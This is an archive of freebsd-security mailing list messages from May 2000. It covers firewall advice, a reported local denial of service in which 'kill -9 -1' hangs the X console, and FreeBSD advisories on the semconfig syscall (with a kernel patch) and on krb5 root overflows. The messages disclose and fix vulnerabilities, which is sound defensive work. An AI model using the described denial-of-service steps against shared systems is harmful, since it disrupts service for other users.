X-Sender: pbm@anthrax.barmentlo.net To: Ron Smith Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc In-Reply-To: <20000525011936.90760.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hai, why not deny all by default and just allow what you want instead ? (most be a lot less rules then..;-) patrick On Wed, 24 May 2000, Ron Smith wrote: > Hi all, > > I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close > 'sunrpc' on port 111. I can't seem to find anything specific on how to do > that at freebsd.org or in "The Complete FreeBSD" or "Building Inernet > Firewalls". 'netstat -na ' still shows port 111 listening on both > 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone > point me in the right direction? > > TIA > Ron Smith > > ________________________________________________________________________ > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-ipfw" in the body of the message > -- Patrick Barmentlo patrick@barmentlo.nl - pgp key ID 0x8E372335 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 26 8:46:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id 57B1537BD99 for ; Fri, 26 May 2000 08:46:27 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1) with ESMTP id TAA08439; Fri, 26 May 2000 19:43:54 +0400 (MSD) Date: Fri, 26 May 2000 19:43:57 +0400 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.41) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <11822.000526@sandy.ru> To: "~jim" Cc: VULN-DEV@SECURITYFOCUS.COM, freebsd-security@FreeBSD.ORG Subject: Re: Local DoS : RedHat 6.0 In-reply-To: <20000523214556.A4977@quebix.dyndns.org> References: <20000523214556.A4977@quebix.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello ~jim, Same results are under FreeBSD 3.2 with XFree86 3.3.3.1 and FreeBSD 4.0 with XFree86 3.3.6, so it seems to be common X(Free86 ?) problem. Since X server can be launched via telnet session it's not necessary to be console user to crash console this way. P.S. no reaction on Ctrl+Alt+Backspace or Ctrl+Alt+del, no X server, xdm or any other X processes to kill, but host is alive, you can startx again via telnet to solve problem. 24.05.00 5:45, you wrote: Local DoS : RedHat 6.0; ~> While killing yet another zombie Netscape process, I made the mistake of ~> typing "kill -9 -1 " as opposed to the normal "kill -9 ." For ~> obvious reasons, this attempted to kill every process owned by my user ~> and hung the entire system in the process. (aka. I couldn't even switch ~> to another console to attempt recovery.) Unfortunately the only way to ~> recover was to "hard boot" the system and run the risk of corrupting my ~> root partition in the process. (Of course with my luck it corrupted.) ~> I actually noticed this "bug" about a year ago, but since forgot about ~> it. From what I've experienced, it definitely happens when a user types ~> "kill -9 -1" while in RedHat 6.0's Gnome/Enlightenment or Afterstep, ~> however I haven't tested any other window managers or versions of Linux. /3APA3A http://www.security.nnov.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 26 9: 2:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from horizon.barak-online.net (horizon.barak.net.il [206.49.94.218]) by hub.freebsd.org (Postfix) with ESMTP id 3A97E37B55E for ; Fri, 26 May 2000 09:02:19 -0700 (PDT) (envelope-from bk532@iname.com) Received: from localhost.local.net (pop09-1-ras1-p166.barak.net.il [212.150.8.166]) by horizon.barak-online.net (8.9.3/8.9.1) with ESMTP id TAA07570; Fri, 26 May 2000 19:01:17 +0300 (IDT) Received: from iname.com (localhost.local.net [127.0.0.1]) by localhost.local.net (8.9.3/8.9.3) with ESMTP id LAA40578; Fri, 26 May 2000 11:41:17 +0300 (IDT) (envelope-from bk532@iname.com) Message-ID: <392E38AC.5A665E69@iname.com> Date: Fri, 26 May 2000 11:41:16 +0300 From: Boris Karnaukh Organization: Private person X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.4-STABLE i386) X-Accept-Language: en, ru MIME-Version: 1.0 To: BD Cc: freebsd-security@FreeBSD.ORG Subject: Re: Web Server and Xwindows References: Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org BD wrote: > > I've never used or installed IPSEC although I'm aware that is part of > 4.0(?). Since I will only use X localy is this still necessary? I had > planned to use ipfw to block X at the interface. I am completly ignorant > when it comes to securing X (that's why I've never used it before). > You can simply run X server with -nolisten tcp option. For example: startx -- -nolisten tcp All your X servers will use for communication unix sockets but not tcp. -- Boris Karnaukh (mailto:bk532@iname.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 26 10:33: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 4DB1C37BE94; Fri, 26 May 2000 10:32:23 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:19.semconfig Reply-To: security-officer@freebsd.org From: FreeBSD Security Officer Message-Id: <20000526173223.4DB1C37BE94@hub.freebsd.org> Date: Fri, 26 May 2000 10:32:23 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:19 Security Advisory FreeBSD, Inc. Topic: local users can prevent all processes from exiting Category: core Module: kernel Announced: 2000-05-26 Credits: Peter Wemm Affects: 386BSD-derived OSes, including all versions of FreeBSD, NetBSD and OpenBSD. Corrected: 2000-05-01 FreeBSD only: NO Patch: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:19/semconfig.patch I. Background System V IPC is a set of interfaces for providing inter-process communication, in the form of shared memory segments, message queues and semaphores. These are managed in user-space by ipcs(1) and related utilities. II. Problem Description An undocumented system call is incorrectly exported from the kernel without access-control checks. This operation causes the acquisition in the kernel of a global semaphore which causes all processes on the system to block during exit() handling, thereby preventing any process from exiting until the corresponding "unblock" system call is issued. This operation was intended for use only by ipcs(1) to atomically sample the state of System V IPC resources on the system (i.e., to ensure that resources are not allocated or deallocated during the process of sampling itself). In the future, this functionality may be reimplemented as a sysctl() node. III. Impact An unprivileged local user can cause every process on the system to hang during exiting. In other words, after the system call is issued, no process on the system will be able to exit completely until another user issues the "unblock" call or the system is rebooted. This is a denial-of-service attack. IV. Workaround None available. V. Solution Upgrade to FreeBSD 2.1.7.1-STABLE, 2.2.8-STABLE, 3.4-STABLE, 4.0-STABLE or 5.0-CURRENT after the correction date. Alternatively, apply the following patch and rebuild the kernel and the src/usr.bin/ipcs utility. This patch removes the semconfig() syscall. It has been tested to apply cleanly against 3.4-RELEASE, 3.4-STABLE, 4.0-RELEASE and 4.0-STABLE systems. 1) Save this advisory as a file, and run the following commands as root: # cd /usr/src # patch -p < /path/to/advisory # cd usr.bin/ipcs # make all install 2) Rebuild and reinstall the kernel and kernel modules as described in the FreeBSD handbook (see: http://www.freebsd.org/handbook/kernelconfig.html for more information) 3) Reboot the system Patches for FreeBSD systems before the resolution date: --- sys/kern/syscalls.master 2000/01/19 06:01:07 1.72 +++ sys/kern/syscalls.master 2000/05/01 11:15:10 1.72.2.1 @@ -342,7 +342,7 @@ 221 STD BSD { int semget(key_t key, int nsems, int semflg); } 222 STD BSD { int semop(int semid, struct sembuf *sops, \ u_int nsops); } -223 STD BSD { int semconfig(int flag); } +223 UNIMPL NOHIDE semconfig 224 STD BSD { int msgctl(int msqid, int cmd, \ struct msqid_ds *buf); } 225 STD BSD { int msgget(key_t key, int msgflg); } --- sys/kern/init_sysent.c 2000/01/19 06:02:29 1.79 +++ sys/kern/init_sysent.c 2000/05/01 11:15:56 1.79.2.1 @@ -243,7 +243,7 @@ { 4, (sy_call_t *)__semctl }, /* 220 = __semctl */ { 3, (sy_call_t *)semget }, /* 221 = semget */ { 3, (sy_call_t *)semop }, /* 222 = semop */ - { 1, (sy_call_t *)semconfig }, /* 223 = semconfig */ + { 0, (sy_call_t *)nosys }, /* 223 = semconfig */ { 3, (sy_call_t *)msgctl }, /* 224 = msgctl */ { 2, (sy_call_t *)msgget }, /* 225 = msgget */ { 4, (sy_call_t *)msgsnd }, /* 226 = msgsnd */ --- sys/kern/syscalls.c 2000/01/19 06:02:29 1.71 +++ sys/kern/syscalls.c 2000/05/01 11:15:56 1.71.2.1 @@ -230,7 +230,7 @@ "__semctl", /* 220 = __semctl */ "semget", /* 221 = semget */ "semop", /* 222 = semop */ - "semconfig", /* 223 = semconfig */ + "#223", /* 223 = semconfig */ "msgctl", /* 224 = msgctl */ "msgget", /* 225 = msgget */ "msgsnd", /* 226 = msgsnd */ --- sys/kern/sysv_ipc.c 2000/02/29 22:58:59 1.13 +++ sys/kern/sysv_ipc.c 2000/05/01 11:15:56 1.13.2.1 @@ -107,15 +107,6 @@ semsys(p, uap) struct proc *p; struct semsys_args *uap; -{ - sysv_nosys(p, "SYSVSEM"); - return nosys(p, (struct nosys_args *)uap); -}; - -int -semconfig(p, uap) - struct proc *p; - struct semconfig_args *uap; { sysv_nosys(p, "SYSVSEM"); return nosys(p, (struct nosys_args *)uap); --- sys/kern/sysv_sem.c 2000/04/02 08:47:08 1.24.2.1 +++ sys/kern/sysv_sem.c 2000/05/01 11:15:56 1.24.2.2 @@ -26,8 +26,6 @@ int semget __P((struct proc *p, struct semget_args *uap)); struct semop_args; int semop __P((struct proc *p, struct semop_args *uap)); -struct semconfig_args; -int semconfig __P((struct proc *p, struct semconfig_args *uap)); #endif static struct sem_undo *semu_alloc __P((struct proc *p)); @@ -38,7 +36,7 @@ /* XXX casting to (sy_call_t *) is bogus, as usual. */ static sy_call_t *semcalls[] = { (sy_call_t *)__semctl, (sy_call_t *)semget, - (sy_call_t *)semop, (sy_call_t *)semconfig + (sy_call_t *)semop }; static int semtot = 0; @@ -47,8 +45,6 @@ static struct sem_undo *semu_list; /* list of active undo structures */ int *semu; /* undo structure pool */ -static struct proc *semlock_holder = NULL; - void seminit(dummy) void *dummy; @@ -87,64 +83,12 @@ } */ *uap; { - while (semlock_holder != NULL && semlock_holder != p) - (void) tsleep((caddr_t)&semlock_holder, (PZERO - 4), "semsys", 0); - if (uap->which >= sizeof(semcalls)/sizeof(semcalls[0])) return (EINVAL); return ((*semcalls[uap->which])(p, &uap->a2)); } /* - * Lock or unlock the entire semaphore facility. - * - * This will probably eventually evolve into a general purpose semaphore - * facility status enquiry mechanism (I don't like the "read /dev/kmem" - * approach currently taken by ipcs and the amount of info that we want - * to be able to extract for ipcs is probably beyond what the capability - * of the getkerninfo facility. - * - * At the time that the current version of semconfig was written, ipcs is - * the only user of the semconfig facility. It uses it to ensure that the - * semaphore facility data structures remain static while it fishes around - * in /dev/kmem. - */ - -#ifndef _SYS_SYSPROTO_H_ -struct semconfig_args { - semconfig_ctl_t flag; -}; -#endif - -int -semconfig(p, uap) - struct proc *p; - struct semconfig_args *uap; -{ - int eval = 0; - - switch (uap->flag) { - case SEM_CONFIG_FREEZE: - semlock_holder = p; - break; - - case SEM_CONFIG_THAW: - semlock_holder = NULL; - wakeup((caddr_t)&semlock_holder); - break; - - default: - printf("semconfig: unknown flag parameter value (%d) - ignored\n", - uap->flag); - eval = EINVAL; - break; - } - - p->p_retval[0] = 0; - return(eval); -} - -/* * Allocate a new sem_undo structure for a process * (returns ptr to structure or NULL if no more room) */ @@ -873,17 +817,6 @@ register struct sem_undo **supptr; int did_something; - /* - * If somebody else is holding the global semaphore facility lock - * then sleep until it is released. - */ - while (semlock_holder != NULL && semlock_holder != p) { -#ifdef SEM_DEBUG - printf("semaphore facility locked - sleeping ...\n"); -#endif - (void) tsleep((caddr_t)&semlock_holder, (PZERO - 4), "semext", 0); - } - did_something = 0; /* @@ -898,7 +831,7 @@ } if (suptr == NULL) - goto unlock; + return; #ifdef SEM_DEBUG printf("proc @%08x has undo structure with %d entries\n", p, @@ -955,14 +888,4 @@ #endif suptr->un_proc = NULL; *supptr = suptr->un_next; - -unlock: - /* - * If the exiting process is holding the global semaphore facility - * lock then release it. - */ - if (semlock_holder == p) { - semlock_holder = NULL; - wakeup((caddr_t)&semlock_holder); - } } --- sys/sys/sem.h 1999/12/29 04:24:46 1.20 +++ sys/sys/sem.h 2000/05/01 11:15:58 1.20.2.1 @@ -163,13 +163,5 @@ * Process sem_undo vectors at proc exit. */ void semexit __P((struct proc *p)); - -/* - * Parameters to the semconfig system call - */ -typedef enum { - SEM_CONFIG_FREEZE, /* Freeze the semaphore facility. */ - SEM_CONFIG_THAW /* Thaw the semaphore facility. */ -} semconfig_ctl_t; #endif /* _KERNEL */ --- sys/sys/syscall-hide.h 2000/01/19 06:02:31 1.65 +++ sys/sys/syscall-hide.h 2000/05/01 11:15:58 1.65.2.1 @@ -191,7 +191,6 @@ HIDE_BSD(__semctl) HIDE_BSD(semget) HIDE_BSD(semop) -HIDE_BSD(semconfig) HIDE_BSD(msgctl) HIDE_BSD(msgget) HIDE_BSD(msgsnd) --- sys/sys/syscall.h 2000/01/19 06:02:31 1.69 +++ sys/sys/syscall.h 2000/05/01 11:15:59 1.69.2.1 @@ -196,7 +196,6 @@ #define SYS___semctl 220 #define SYS_semget 221 #define SYS_semop 222 -#define SYS_semconfig 223 #define SYS_msgctl 224 #define SYS_msgget 225 #define SYS_msgsnd 226 --- sys/sys/syscall.mk 2000/01/19 06:07:34 1.23 +++ sys/sys/syscall.mk 2000/05/01 11:15:59 1.23.2.1 @@ -148,7 +148,6 @@ __semctl.o \ semget.o \ semop.o \ - semconfig.o \ msgctl.o \ msgget.o \ msgsnd.o \ --- sys/sys/sysproto.h 2000/01/19 06:02:31 1.59 +++ sys/sys/sysproto.h 2000/05/01 11:16:00 1.59.2.1 @@ -662,9 +662,6 @@ struct sembuf * sops; char sops_[PAD_(struct sembuf *)]; u_int nsops; char nsops_[PAD_(u_int)]; }; -struct semconfig_args { - int flag; char flag_[PAD_(int)]; -}; struct msgctl_args { int msqid; char msqid_[PAD_(int)]; int cmd; char cmd_[PAD_(int)]; @@ -1158,7 +1155,6 @@ int __semctl __P((struct proc *, struct __semctl_args *)); int semget __P((struct proc *, struct semget_args *)); int semop __P((struct proc *, struct semop_args *)); -int semconfig __P((struct proc *, struct semconfig_args *)); int msgctl __P((struct proc *, struct msgctl_args *)); int msgget __P((struct proc *, struct msgget_args *)); int msgsnd __P((struct proc *, struct msgsnd_args *)); --- usr.bin/ipcs/ipcs.c 1999/12/29 05:05:32 1.12 +++ usr.bin/ipcs/ipcs.c 2000/05/01 10:51:37 1.12.2.1 @@ -56,7 +56,6 @@ struct shminfo shminfo; struct shmid_ds *shmsegs; -int semconfig __P((int,...)); void usage __P((void)); static struct nlist symbols[] = { @@ -420,11 +419,6 @@ seminfo.semaem); } if (display & SEMINFO) { - if (semconfig(SEM_CONFIG_FREEZE) != 0) { - perror("semconfig"); - fprintf(stderr, - "Can't lock semaphore facility - winging it...\n"); - } kvm_read(kd, symbols[X_SEMA].n_value, &sema, sizeof(sema)); xsema = malloc(sizeof(struct semid_ds) * seminfo.semmni); kvm_read(kd, (u_long) sema, xsema, sizeof(struct semid_ds) * seminfo.semmni); @@ -470,8 +464,6 @@ printf("\n"); } } - - (void) semconfig(SEM_CONFIG_THAW); printf("\n"); } -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOS60U1UuHi5z0oilAQHsmQP/aCL1lV5RiVnP9Cm6AE6NU6o3pqFLKQWa RIeGgjOHJ8ctkQQj3ljECh49eCsdYKSGYkPzFlPg2ikgRylcjQDo+pakLB3IUuEE X+bSvyaayM5yF+v2pLj7FgarcvxsbattzL8WcHcNMWAJ5wCyceh85/8bsUdVyEJm Qw17BQPDPcU= =hKnq -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 26 10:40:51 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 514AE37BF77; Fri, 26 May 2000 10:40:39 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:20.krb5 Reply-To: security-officer@freebsd.org From: FreeBSD Security Officer Message-Id: <20000526174039.514AE37BF77@hub.freebsd.org> Date: Fri, 26 May 2000 10:40:39 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:20 Security Advisory FreeBSD, Inc. Topic: krb5 port contains remote and local root exploits. Category: ports Module: krb5 Announced: 2000-05-26 Credits: Jeffrey I. Schiller Affects: Ports collection prior to the correction date Corrected: 2000-05-17 Vendor status: Patch released FreeBSD only: NO I. Background MIT Kerberos 5 is an implementation of the Kerberos 5 protocol which is available in the FreeBSD ports collection as the security/krb5 port. FreeBSD also includes separately-developed Kerberos 4 and 5 implementations from KTH, which are optionally installed as part of the base system (KTH Heimdal, the Kerberos 5 implementation, is currently considered "experimental" software). II. Problem Description The MIT Kerberos 5 port, versions 1.1.1 and earlier, contains several remote and local buffer overflows which can lead to root compromise. Note that the implementations of Kerberos shipped in the FreeBSD base system are separately-developed software to MIT Kerberos and are believed not to be vulnerable to these problems. However, a very old release of FreeBSD dating from 1997 (FreeBSD 2.2.5) did ship with a closely MIT-derived Kerberos implementation ("eBones") and may be vulnerable to attacks of the kind described here. Any users still using FreeBSD 2.2.5 and who have installed the optional Kerberos distribution are urged to upgrade to 2.2.8-STABLE or later. Note however that FreeBSD 2.x is no longer an officially supported version, nor are security fixes always provided. The krb5 port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains nearly 3300 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.0 contains this problem since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Local or remote users can obtain root access on the system running krb5. If you have not chosen to install the krb5 port, then your system is not vulnerable to this problem. IV. Workaround Due to the nature of the vulnerability there are several programs and network services which are affected. If recompiling the port is not practical, please see the MIT Kerberos advisory for suggested workarounds (including the disabling or adjustment of services and removal of setuid permissions on vulnerable binaries). The advisory can be found at the following location: http://web.mit.edu/kerberos/www/advisories/krb4buf.txt V. Solution 1) Upgrade your entire ports collection and rebuild the krb5 port. A package is not provided for this port for export control reasons. 2) download a new port skeleton for the krb5 port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 3) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOS626lUuHi5z0oilAQHUWAP+LqSso3fDe+k7/6EJMc5iH9JgbrD2JARh mQOV6m9qUgZbcaEc9oUrsEJIurFGGukCAbGA82dPHGWpNFzbzL3pXgqcswVvHIqV qoZuzLyLV5+1NaurwovmXD2hQH56Cgaa+N4byxuxs+cnIbfJNF8DEYjhnPqVHc9l sP0RelxSDuk= =yPXe -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message